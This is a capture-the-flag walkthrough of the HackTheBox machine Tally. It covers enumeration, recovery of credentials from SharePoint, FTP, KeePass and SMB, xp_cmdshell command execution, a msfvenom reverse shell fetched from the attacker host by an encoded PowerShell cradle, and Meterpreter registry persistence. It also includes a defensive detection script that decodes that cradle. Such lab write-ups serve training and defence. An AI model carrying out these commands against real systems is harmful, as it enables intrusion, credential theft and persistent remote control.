HackTheBox Tally

Writeup for HackTheBox Tally

Machine Synopsis

Tally can be a very challenging machine for some. It focuses on many different aspects of real Windows environments and requires users to modify and compile an exploit for escalation. Not covered in this document is the use of Rotten Potato, which is an unintended alternate method for privilege escalation. (Source)

Enumeration

❯ nmap -p- --min-rate 10000 10.10.10.59

Not shown: 65514 closed tcp ports (reset)
PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
81/tcp    open  hosts2-ns
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
808/tcp   open  ccproxy-http
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
15567/tcp open  unknown
32843/tcp open  unknown
32844/tcp open  unknown
32846/tcp open  unknown
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown

❯ nmap -p 21,80,81,135,139,445,808,1433,5985,15567,32843,32844,32846,47001 -sC -sV 10.10.10.59

PORT      STATE SERVICE              VERSION
21/tcp    open  ftp                  Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http                 Microsoft IIS httpd 10.0
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
81/tcp    open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Bad Request
135/tcp   open  msrpc                Microsoft Windows RPC
139/tcp   open  netbios-ssn          Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds         Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   open  ccproxy-http?
1433/tcp  open  ms-sql-s             Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-info: 
|   10.10.10.59:1433: 
|     Version: 
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-22T02:27:26
|_Not valid after:  2055-01-22T02:27:26
| ms-sql-ntlm-info: 
|   10.10.10.59:1433: 
|     Target_Name: TALLY
|     NetBIOS_Domain_Name: TALLY
|     NetBIOS_Computer_Name: TALLY
|     DNS_Domain_Name: TALLY
|     DNS_Computer_Name: TALLY
|_    Product_Version: 10.0.14393
|_ssl-date: 2025-01-22T02:30:38+00:00; -15m38s from scanner time.
5985/tcp  open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
15567/tcp open  http                 Microsoft IIS httpd 10.0
| http-ntlm-info: 
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|   Negotiate
|_  NTLM
|_http-title: Site doesn't have a title.
|_http-server-header: Microsoft-IIS/10.0
32843/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0
32844/tcp open  ssl/http             Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
| tls-alpn: 
|   h2
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-01-22T02:30:38+00:00; -15m38s from scanner time.
|_http-title: Service Unavailable
32846/tcp open  msexchange-logcopier Microsoft Exchange 2010 log copier
47001/tcp open  http                 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_clock-skew: mean: -15m38s, deviation: 0s, median: -15m38s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-time: 
|   date: 2025-01-22T02:30:16
|_  start_date: 2025-01-22T02:27:12

Let's add the hostname to our /etc/hosts file.

echo -e '10.10.10.59\t\ttally' | sudo tee -a /etc/hosts
[sudo] password for shiro: 
10.10.10.59		tally

Check out their website.

[screenshot: webpage]

It looks like a SharePoint page with no contents.

Let's use a publicly available tool to brute force the SharePoint directories.

❯ wget https://raw.githubusercontent.com/bhasbor/SharePointURLBrute-v1.1/refs/heads/master/SharePointURLBrute%20v1.1.pl
❯ wget https://raw.githubusercontent.com/bhasbor/SharePointURLBrute-v1.1/refs/heads/master/SharePoint-UrlExtensions-18Mar2012.txt

❯ perl SharePointURLBrute\ v1.1.pl -a 'http://tally' -e SharePoint-UrlExtensions-18Mar2012.txt

Starting search for common SharePoint Pages
Start Time: Wed Jan 22 11:01:29 2025

FOUND: http://tally/_catalogs/masterpage/Forms/AllItems.aspx
FOUND: http://tally/_catalogs/wp/Forms/AllItems.aspx
FOUND: http://tally/_layouts/AreaNavigationSettings.aspx
FOUND: http://tally/_Layouts/AreaTemplateSettings.aspx
FOUND: http://tally/_Layouts/AreaWelcomePage.aspx
FOUND: http://tally/_Layouts/ChangeSiteMasterPage.aspx
FOUND: http://tally/_layouts/MyInfo.aspx
FOUND: http://tally/_layouts/MyPage.aspx
FOUND: http://tally/_layouts/PageSettings.aspx
FOUND: http://tally/_layouts/policy.aspx
FOUND: http://tally/_layouts/policyconfig.aspx
FOUND: http://tally/_layouts/policycts.aspx
FOUND: http://tally/_layouts/Policylist.aspx
FOUND: http://tally/_Layouts/RedirectPage.aspx?Target={SiteCollectionUrl}_catalogs/masterpage
FOUND: http://tally/_layouts/SiteDirectorySettings.aspx
FOUND: http://tally/_layouts/sitemanager.aspx
FOUND: http://tally/_Layouts/SiteManager.aspx?lro=all
FOUND: http://tally/_vti_bin/alerts.asmx
FOUND: http://tally/_vti_bin/dspsts.asmx
FOUND: http://tally/_vti_bin/forms.asmx
FOUND: http://tally/_vti_bin/Lists.asmx
FOUND: http://tally/_vti_bin/people.asmx
FOUND: http://tally/_vti_bin/Permissions.asmx
FOUND: http://tally/_vti_bin/search.asmx
FOUND: http://tally/_vti_bin/UserGroup.asmx
FOUND: http://tally/_vti_bin/versions.asmx
FOUND: http://tally/_vti_bin/Views.asmx
FOUND: http://tally/_vti_bin/webpartpages.asmx
FOUND: http://tally/_vti_bin/webs.asmx
FOUND: http://tally/_vti_bin/SharepointEmailWS.asmx
FOUND: http://tally/_vti_bin/spsearch.asmx
FOUND: http://tally/_vti_bin/WebPartPages.asmx
FOUND: http://tally/default.aspx
FOUND: http://tally/shared documents/forms/allitems.aspx

Search Complete
Total # of SP Admin URLs Found: 34

We could also use gobuster to brute force the directories.

❯ gobuster dir -u http://tally -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt
...
/_layouts/viewlsts.aspx (Status: 302) [Size: 143] [--> /_layouts/15/viewlsts.aspx]
..

Accessing http://tally/_layouts/15/viewlsts.aspx will list the site contents.

[screenshot: site contents]

[screenshot: shared documents]

Opening the ftp-details.docx reveals the following information.

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

Now that we have a possible password, we have to find some usernames.

Navigate to http://tally/_layouts/15/start.aspx#/SitePages/Forms/AllPages.aspx and notice that there is a FinanceTeam page.

[screenshot: site pages]

Opening the link reveals some interesting information.

[screenshot: finance team page]

A possible username is found: ftp_user.

❯ ftp 10.10.10.59
Connected to 10.10.10.59.
220 Microsoft FTP Service
Name (10.10.10.59:shiro): ftp_user
331 Password required
Password: UTDRSCH53c"$6hys
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||50302|)
150 Opening ASCII mode data connection.
08-31-17  10:51PM       <DIR>          From-Custodian
10-01-17  10:37PM       <DIR>          Intranet
08-28-17  05:56PM       <DIR>          Logs
09-15-17  08:30PM       <DIR>          To-Upload
09-17-17  08:27PM       <DIR>          User
226 Transfer complete.

It looks like there might be a lot of files. Let's download the entire FTP tree to our local machine.

❯ wget -r 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'

Use grep to find any interesting information we need.

grep -riE "password|pass|pwd|secret|config|key|token|cred" 10.10.10.59_ftp
grep: 10.10.10.59_ftp/User/Paul/Monetary_penalties_for_breaches_of_financial_sanctions.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Paul/financial_sanctions_guidance_august_2017.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Paul/financial-list-guide.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Ekta/OFSI_quick_guide_flyer.pdf: binary file matches
grep: 10.10.10.59_ftp/User/Jess/actu8-espreadsheet-designer-datasheet.pdf: binary file matches
10.10.10.59_ftp/User/Stuart/customers - Copy.csv:65,Gasper,Stokey,South State Corporation,3554455475076550,jcb
10.10.10.59_ftp/User/Stuart/customers - Copy.csv:187,Whittaker,Maffi,Harvest Capital Credit Corporation,3578906182504641,jcb
10.10.10.59_ftp/User/Stuart/customers - Copy.csv:226,Deane,De Moreno,"China Commercial Credit, Inc.",337941269432570,americanexpress
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePassLibC64.dll: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/ShInstUtil.exe: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.XmlSerializers.dll: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe: binary file matches
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt:KeePass: Copyright (C) 2003-2017 Dominik Reichl <dominik.reichl@t-online.de>.
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt:'KeePass.chm'.
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt:software.  If the software is modified by someone else and passed on, we
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/License.txt:  `Gnomovision' (which makes passes at compilers) written by James Hacker.
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePassLibC32.dll: binary file matches
grep: 10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.chm: binary file matches
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config:<configuration>
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config:			<assemblyIdentity name="KeePass"
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config:			publicKeyToken="fed2ed7716aecf5c"
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config:		<add key="EnableWindowsFormsHighDpiAutoResizing" value="true" />
10.10.10.59_ftp/User/Tim/Files/KeePass-2.36/KeePass.exe.config:</configuration>
10.10.10.59_ftp/User/Tim/Project/Log/do to.txt:encrypted share creds:
10.10.10.59_ftp/User/Tim/Project/Log/do to.txt:password in keepass
grep: 10.10.10.59_ftp/User/Sarah/Windows-KB890830-x64-V5.52.exe: binary file matches
grep: 10.10.10.59_ftp/User/Sarah/MBSASetup-x64-EN.msi: binary file matches
grep: 10.10.10.59_ftp/Intranet/Binaries/Firefox Setup 44.0.2.exe: binary file matches

It looks like there is a KeePass database in Tim's folder. Let's enumerate the files in the /User directory.

❯ cd 10.10.10.59_ftp/User/
❯ ls
Administrator  Ekta  Jess  Paul  Rahul  Sarah  Stuart  Tim  Yenwi
❯ find . -type f
./Paul/Monetary_penalties_for_breaches_of_financial_sanctions.pdf
./Paul/financial_sanctions_guidance_august_2017.pdf
./Paul/financial-list-guide.pdf
./Ekta/PSAIS_1_April_2017.pdf
./Ekta/OFSI_quick_guide_flyer.pdf
./Jess/actu8-espreadsheet-designer-datasheet.pdf
./Stuart/customers - Copy.csv
./Stuart/Unit4-Connect-Financials-Agenda.pdf
./Tim/Files/tim.kdbx
./Tim/Files/KeePass-2.36/KeePassLibC64.dll
./Tim/Files/KeePass-2.36/ShInstUtil.exe
./Tim/Files/KeePass-2.36/KeePass.XmlSerializers.dll
./Tim/Files/KeePass-2.36/KeePass.exe
./Tim/Files/KeePass-2.36/License.txt
./Tim/Files/KeePass-2.36/KeePassLibC32.dll
./Tim/Files/KeePass-2.36/KeePass.chm
./Tim/Files/KeePass-2.36/KeePass.exe.config
./Tim/Files/bonus.txt
./Tim/Project/Log/do to.txt
./Sarah/Windows-KB890830-x64-V5.52.exe
./Sarah/notes.txt
./Sarah/MBSASetup-x64-EN.msi

Nothing really useful in Sarah's notes.txt.

❯ cat ./Sarah/notes.txt

done

install Sharepoint, replace Orchard CMS

to do

uninstall SQL Server 2016

However, we can try to crack Tim's KeePass database by converting it into a hash with keepass2john and then running john against it.

❯ keepass2john ./Tim/Files/tim.kdbx > tim.hash
❯ john --wordlist=/usr/share/wordlists/rockyou.txt tim.hash
...
simplementeyo    (tim)  

We found the password simplementeyo for the KeePass database. Let's open it.

❯ kpcli --kdb tim.kdbx
Provide the master password: *************************

KeePass CLI (kpcli) v3.8.1 is ready for operation.
Type 'help' for a description of available commands.
Type 'help <command>' for details on individual commands.

kpcli:/> 

Use find . to list all the entries in the database.

kpcli:/> find .
Searching for "." ...
 - 3 matches found and placed into /_found/
Would you like to list them now? [y/N] 
=== Entries ===
0. Default                                                                
1. PDF Writer                                                             
2. TALLY ACCT share                                                       

Use show to show the entries.

kpcli:/> show -f 0

 Path: /WORK/CISCO/
Title: Default
Uname: cisco
 Pass: cisco123
  URL: 
Notes: 

kpcli:/> show -f 1

 Path: /WORK/SOFTWARE/
Title: PDF Writer
Uname: 64257-56525-54257-54734
 Pass: 
  URL: 
Notes: 

kpcli:/> show -f 2

 Path: /WORK/WINDOWS/Shares/
Title: TALLY ACCT share
Uname: Finance
 Pass: Acc0unting
  URL: 
Notes: 

It seems we now have several possible usernames and passwords.

Let's note down all the possible users and passwords in users.txt and passwords.txt.

❯ cat users.txt
cisco
Finance
ftp_user

❯ cat passwords.txt
UTDRSCH53c"$6hys
simplementeyo
cisco123
Acc0unting 

Try every combination of the possible credentials against SMB using nxc (NetExec).

❯ nxc smb 10.10.10.59 -u users.txt -p passwords.txt --continue-on-success
SMB         10.10.10.59     445    TALLY            [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB         10.10.10.59     445    TALLY            [-] TALLY\cisco:UTDRSCH53c"$6hys STATUS_LOGON_FAILURE
SMB         10.10.10.59     445    TALLY            [-] TALLY\Finance:UTDRSCH53c"$6hys STATUS_LOGON_FAILURE
SMB         10.10.10.59     445    TALLY            [+] TALLY\ftp_user:UTDRSCH53c"$6hys
SMB         10.10.10.59     445    TALLY            [-] TALLY\cisco:simplementeyo STATUS_LOGON_FAILURE
SMB         10.10.10.59     445    TALLY            [-] TALLY\Finance:simplementeyo STATUS_LOGON_FAILURE
SMB         10.10.10.59     445    TALLY            [-] TALLY\cisco:cisco123 STATUS_LOGON_FAILURE
SMB         10.10.10.59     445    TALLY            [-] TALLY\Finance:cisco123 STATUS_LOGON_FAILURE
SMB         10.10.10.59     445    TALLY            [-] TALLY\cisco:Acc0unting STATUS_LOGON_FAILURE
SMB         10.10.10.59     445    TALLY            [+] TALLY\Finance:Acc0unting

It looks like the credential Finance:Acc0unting worked. Let's enumerate the SMB shares.

❯ nxc smb 10.10.10.59 -u Finance -p Acc0unting --shares
SMB         10.10.10.59     445    TALLY            [*] Windows Server 2016 Standard 14393 x64 (name:TALLY) (domain:TALLY) (signing:False) (SMBv1:True)
SMB         10.10.10.59     445    TALLY            [+] TALLY\Finance:Acc0unting 
SMB         10.10.10.59     445    TALLY            [*] Enumerated shares
SMB         10.10.10.59     445    TALLY            Share           Permissions     Remark
SMB         10.10.10.59     445    TALLY            -----           -----------     ------
SMB         10.10.10.59     445    TALLY            ACCT            READ            
SMB         10.10.10.59     445    TALLY            ADMIN$                          Remote Admin
SMB         10.10.10.59     445    TALLY            C$                              Default share
SMB         10.10.10.59     445    TALLY            IPC$                            Remote IPC

It seems that we can read the ACCT share. Let's mount it on our local machine.

❯ sudo mount -t cifs -o user=Finance,pass=Acc0unting //10.10.10.59/ACCT /mnt
[sudo] password for shiro: 
❯ cd /mnt
❯ ls
Customers  Fees  Invoices  Jess  Payroll  Reports  Tax  Transactions  zz_Archived  zz_Migration
/mnt ❯ 

Enumerate around for any interesting information.

❯ grep -riE "password|pass|pwd|secret|config|key|token|cred" /mnt
...
/mnt/zz_Archived/SQL/conn-info.txt:pass: YE%TJC%&HYbe5Nw

❯ cat /mnt/zz_Archived/SQL/conn-info.txt
old server details

db: sa
pass: YE%TJC%&HYbe5Nw

have changed for tally

We found a set of credentials, sa:YE%TJC%&HYbe5Nw. However, they turned out not to be useful, as the .txt file says the credentials have since been changed.

After more enumeration, we find that there is an interesting file called tester.exe.

❯ ls -l zz_Migration/Binaries
total 463204
drwxr-xr-x 2 root root         0 Aug 29  2017  CardReader
drwxr-xr-x 2 root root         0 Sep 18  2017  Evals
-rwxr-xr-x 1 root root   2241216 Sep  1  2017  FileZilla_Server-0_9_60_2.exe
-rwxr-xr-x 1 root root     74110 Sep 16  2017  ImportGSTIN.zip
-rwxr-xr-x 1 root root  69999448 Aug 28  2017  NDP452-KB2901907-x86-x64-AllOS-ENU.exe
drwxr-xr-x 2 root root         0 Sep 21  2017 'New folder'
-rwxr-xr-x 1 root root 401347664 Aug 28  2017  Sage50_2017.2.0.exe
drwxr-xr-x 2 root root         0 Sep 14  2017 'Tally.ERP 9 Release 6'
-rwxr-xr-x 1 root root    645729 Sep 16  2017  windirstat1_1_2_setup.exe

❯ ls -l zz_Migration/Binaries/New\ folder
total 676308
-rwxr-xr-x 1 root root  18159024 Sep 12  2017 Macabacus2016.exe
-rwxr-xr-x 1 root root  21906356 Aug 30  2017 Orchard.Web.1.7.3.zip
-rwxr-xr-x 1 root root    483824 Sep 16  2017 RpprtSetup.exe
-rwxr-xr-x 1 root root 389188014 Sep 14  2017 crystal_reports_viewer_2016_sp04_51051980.zip
-rwxr-xr-x 1 root root    774200 Sep 18  2017 putty.exe
-rwxr-xr-x 1 root root 254599112 Sep 12  2017 tableau-desktop-32bit-10-3-2.exe
-rwxr-xr-x 1 root root    215552 Sep  1  2017 tester.exe
-rwxr-xr-x 1 root root   7194312 Sep 14  2017 vcredist_x64.exe

We can try reading the printable strings of the binary with a minimum length of 15.

❯ strings -n 15 zz_Migration/Binaries/New\ folder/tester.exe
!This program cannot be run in DOS mode.
DRIVER={SQL Server};SERVER=TALLY, 1433;DATABASE=orcharddb;UID=sa;PWD=GWE3V65#6KFH93@4GWTG2G;
select * from Orchard_Users_UserPartRecord
Unknown exception
bad locale name
iostream stream error
...

Nice! We managed to find another set of credentials sa:GWE3V65#6KFH93@4GWTG2G.

Exploitation

Use the newly found credentials to connect to the MSSQL service.

❯ impacket-mssqlclient sa:GWE3V65#6KFH93@4GWTG2G@10.10.10.59
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(TALLY): Line 1: Changed database context to 'master'.
[*] INFO(TALLY): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (130 665) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> 

Enable xp_cmdshell and try running a command.

SQL (sa  dbo@master)> enable_xp_cmdshell
INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> xp_cmdshell whoami
output        
-----------   
tally\sarah   

NULL       

Create a Windows reverse shell and encode our PowerShell command.

❯ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT=1234 -f exe -o shell.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: shell.exe
❯ pwsh
PowerShell 7.4.6

┌──(shiro㉿shiro)-[/home/shiro/Documents/HackTheBox/Tally]
└─PS> $command = "(New-Object Net.WebClient).DownloadFile('http://10.10.14.14/shell.exe', 'C:\Users\Public\shell.exe'); Start-Process 'C:\Users\Public\shell.exe'"

┌──(shiro㉿shiro)-[/home/shiro/Documents/HackTheBox/Tally]
└─PS> $encoded = [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($command))

┌──(shiro㉿shiro)-[/home/shiro/Documents/HackTheBox/Tally]
└─PS> Write-Host $encoded
KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA0AC8AcwBoAGUAbABsAC4AZQB4AGUAJwAsACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAHMAaABlAGwAbAAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAGgAZQBsAGwALgBlAHgAZQAnAA==

Copy the encoded command and run it through xp_cmdshell.

SQL (sa  dbo@master)> enable_xp_cmdshell
INFO(TALLY): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
INFO(TALLY): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> xp_cmdshell powershell -e KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA0AC8AcwBoAGUAbABsAC4AZQB4AGUAJwAsACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAHMAaABlAGwAbAAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAGgAZQBsAGwALgBlAHgAZQAnAA==

After a while, our Metasploit listener gets a connection from the reverse shell.

msf6 exploit(multi/handler) > [*] Sending stage (203846 bytes) to 10.10.10.59
[*] Meterpreter session 2 opened (10.10.14.14:1234 -> 10.10.10.59:49681)
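From the defender's side, this foothold has a very recognisable shape in process-creation telemetry: the SQL Server service process spawning cmd.exe through xp_cmdshell, followed by powershell -e carrying a base64-encoded UTF-16LE download-and-execute command. The script below is an added example, not part of the original writeup: it decodes the exact blob generated above and flags that chain over constructed sample events (the event layout, the sqlservr.exe path and the benign control lines are assumptions, not data from the box).

```python
"""Decode `powershell -e` blobs and flag xp_cmdshell-style process chains.

Added example for this writeup. The sample events below are constructed, not
real logs; the encoded blob is the one produced in the writeup above.
"""
import base64
import re
from dataclasses import dataclass
from ntpath import basename
from typing import List, Optional

# Blob generated in the writeup: [Convert]::ToBase64String(Unicode.GetBytes($command)).
ENCODED_FROM_WRITEUP = "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AMQAwAC4AMQAwAC4AMQA0AC4AMQA0AC8AcwBoAGUAbABsAC4AZQB4AGUAJwAsACAAJwBDADoAXABVAHMAZQByAHMAXABQAHUAYgBsAGkAYwBcAHMAaABlAGwAbAAuAGUAeABlACcAKQA7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABzAGgAZQBsAGwALgBlAHgAZQAnAA=="

# powershell -e / -ec / -enc / -EncodedCommand <base64> (case-insensitive, '/' form too).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})")

# Substrings that turn an encoded command into a download-and-execute cradle.
CRADLE_MARKERS = ("Net.WebClient", "DownloadFile", "DownloadString",
                  "Invoke-WebRequest", "Start-Process", "Invoke-Expression")

# Constructed 4688/Sysmon-style events flattened to: host, parent image, image, user, command line.
SQLSERVR = r"C:\Program Files\Microsoft SQL Server\MSSQL13.MSSQLSERVER\MSSQL\Binn\sqlservr.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = "\n".join("\t".join(f) for f in [
    ("TALLY", SQLSERVR, CMD, r"TALLY\Sarah", "cmd.exe /c whoami"),
    ("TALLY", SQLSERVR, CMD, r"TALLY\Sarah", "cmd.exe /c powershell -e " + ENCODED_FROM_WRITEUP),
    ("TALLY", CMD, POWERSHELL, r"TALLY\Sarah", "powershell -e " + ENCODED_FROM_WRITEUP),
    ("TALLY", r"C:\Windows\explorer.exe", POWERSHELL, r"TALLY\Sarah", "powershell -NoProfile -Command Get-Date"),
])


def decode_powershell_encoded(blob: str) -> str:
    """-EncodedCommand carries base64 of the UTF-16LE (what .NET calls Unicode) command."""
    padded = blob + "=" * (-len(blob) % 4)  # tolerate blobs with the '=' stripped
    return base64.b64decode(padded, validate=True).decode("utf-16-le")


def encode_powershell_command(command: str) -> str:
    """The inverse, mirroring [Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($c))."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


@dataclass
class Finding:
    host: str
    user: str
    reasons: List[str]
    decoded: str = ""


def analyse_event(line: str) -> Optional[Finding]:
    """Return a Finding for one flattened event, or None if nothing is suspicious."""
    host, parent, image, user, cmdline = line.split("\t")
    reasons: List[str] = []
    decoded = ""
    # xp_cmdshell runs its commands as a direct child of the SQL Server service process.
    if basename(parent).lower() == "sqlservr.exe" and basename(image).lower() in ("cmd.exe", "powershell.exe"):
        reasons.append("shell spawned directly by SQL Server (xp_cmdshell pattern)")
    m = ENCODED_FLAG.search(cmdline)
    if m:
        try:
            decoded = decode_powershell_encoded(m.group(1))
        except (ValueError, UnicodeDecodeError):
            reasons.append("encoded PowerShell with undecodable payload")
        else:
            hits = [k for k in CRADLE_MARKERS if k.lower() in decoded.lower()]
            reasons.append("encoded PowerShell download/execute cradle: " + ", ".join(hits)
                           if hits else "encoded PowerShell command")
    return Finding(host, user, reasons, decoded) if reasons else None


def scan(log_text: str) -> List[Finding]:
    """Run analyse_event over every non-empty line and keep the findings."""
    findings = []
    for line in log_text.splitlines():
        if line.strip():
            f = analyse_event(line)
            if f:
                findings.append(f)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"[{f.host}] {f.user}: " + "; ".join(f.reasons))
        if f.decoded:
            print("    decoded:", f.decoded)
```

The first two sample events would fire even without any encoding, which is the point: alert on sqlservr.exe spawning a shell at all, and treat the decoded cradle as the second, higher-severity signal.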

Before we proceed, we should create persistence.

meterpreter> bg
msf6 exploit(multi/handler) > use post/windows/manage/persistence_exe 
msf6 post(windows/manage/persistence_exe) > options

Module options (post/windows/manage/persistence_exe):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   REXENAME  default.exe      yes       The name to call exe on remote system
   REXEPATH                   yes       The remote executable to upload and execute.
   RUN_NOW   true             no        Run the installed payload immediately.
   SESSION                    yes       The session to run this module on
   STARTUP   USER             yes       Startup type for the persistent payload. (Accepted: USER, SYSTEM, SERVICE, TASK)


View the full module info with the info, or info -d command.

msf6 post(windows/manage/persistence_exe) > set session 2
msf6 post(windows/manage/persistence_exe) > set REXEPATH shell.exe
REXEPATH => shell.exe
msf6 post(windows/manage/persistence_exe) > run
[*] Running module against TALLY
[*] Reading Payload from file /home/shiro/Documents/HackTheBox/Tally/shell.exe
[+] Persistent Script written to C:\Users\Sarah\AppData\Local\Temp\default.exe
[*] Executing script C:\Users\Sarah\AppData\Local\Temp\default.exe
[+] Agent executed with PID 6292
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RrbkugOfgGokr
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\RrbkugOfgGokr
[*] Cleanup Meterpreter RC File: /home/shiro/.msf4/logs/persistence/TALLY_20250122.1254/TALLY_20250122.1254.rc
[*] Post module execution completed

Now that we have created persistence, we can access the shell and read the user.txt.

meterpreter > shell
Process 4208 created.
Channel 2 created.
